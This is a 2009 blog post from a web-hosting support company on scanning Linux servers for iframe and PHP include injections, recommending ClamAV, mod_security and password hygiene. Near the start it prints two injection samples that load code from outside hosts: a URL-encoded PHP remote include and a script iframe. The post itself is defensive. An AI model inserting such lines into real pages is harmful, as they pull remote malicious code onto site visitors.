web analytics

Blog

How to do virus scan on Linux servers ?

Tags: LinuxSecurityvirus

Published on: April 21, 2009 by George K.

How to do virus scan on Linux servers ?

Scenario:

Do you really need to do virus scan to ensure Linux server security ? Sometimes yes. With the recent high level of iframe/php include/js injections, it seems we need to scan the pages for iframe injections, like below

< ? php include(urldecode("%68%74%74%70%3a%2f%2f%62%75%79%34%6d%65%2e%69%6e%66%6f%2f%73%63%72%2f%31%30%2e%74%78%74")); ? >
< iframe src=http://ms.nesseseni.cn/src.js >< /iframe >

Below are a few URLs which could help you in the process

http://www.google.com/safebrowsing/diagnostic?site=http://supportsages.com
http://www.malwaredomains.com/
http://www.malwaredomainlist.com/mdl.php – A regularly updated list.

You can install clamav antivirus which is open source and do a clamav scan to make sure that the website is not affected. On a cPanel server, the below command will scan the entire website files of each users.

clamscan -i -r –remove /home/*/public_html/

Why would I recommend clamav over other paid antivirus ? For obvious reasons that you can edit ClamAV rules to include more iframe detection rules. Just write a new regex rules in the clamav virus DBs and you have the situation under control, at least for those matching iframe codes.

Other solution would be mod_security 2.5 that could help preventing the page alteration using SQL injection and javascript injection and threats detailed in http://www.gnucitizen.org/blog/atom-2/

Here I was talking about Linux server security. Once infected, there are a few things client has to do as well.

1. Scan your machine as well as your webmaster’ with anti-virus and anti-spyware tools.
2. Once you are sure your computer is clean, change all site passwords. (You might want to change computer and network passwords too.)
3. Now keep the new passwords secure. Don’t use auto-upload features of your WYSIWYG editors or in your FTP browsers. Enter passwords every time you upload new content instead. Use SFTP instead of FTP if possible. Only a few hosts offer sftp though.
4. If your site was flagged by Google at http://www.google.com/safebrowsing/diagnostic , request a malware review via Webmaster Tools.
5. Regularly check your site with diagnostics tools of your choice (like Unmask Parasites ) to be sure your site is clean.

Category : Linux, Security

George K.

George K.

George started his career in web hosting and Linux technical support in the year 2004 and is with SupportSages since 2009. He has keen interest in server optimizations, custom security solutions, hacked server recovery, cyber forensic and high availability fail over system design and implementation. George loves long drives and is passionate about art and literature.

You may also read:

Comments

Add new commentSIGN IN

Let's Connect

Get new updates

Categories

$0.000 items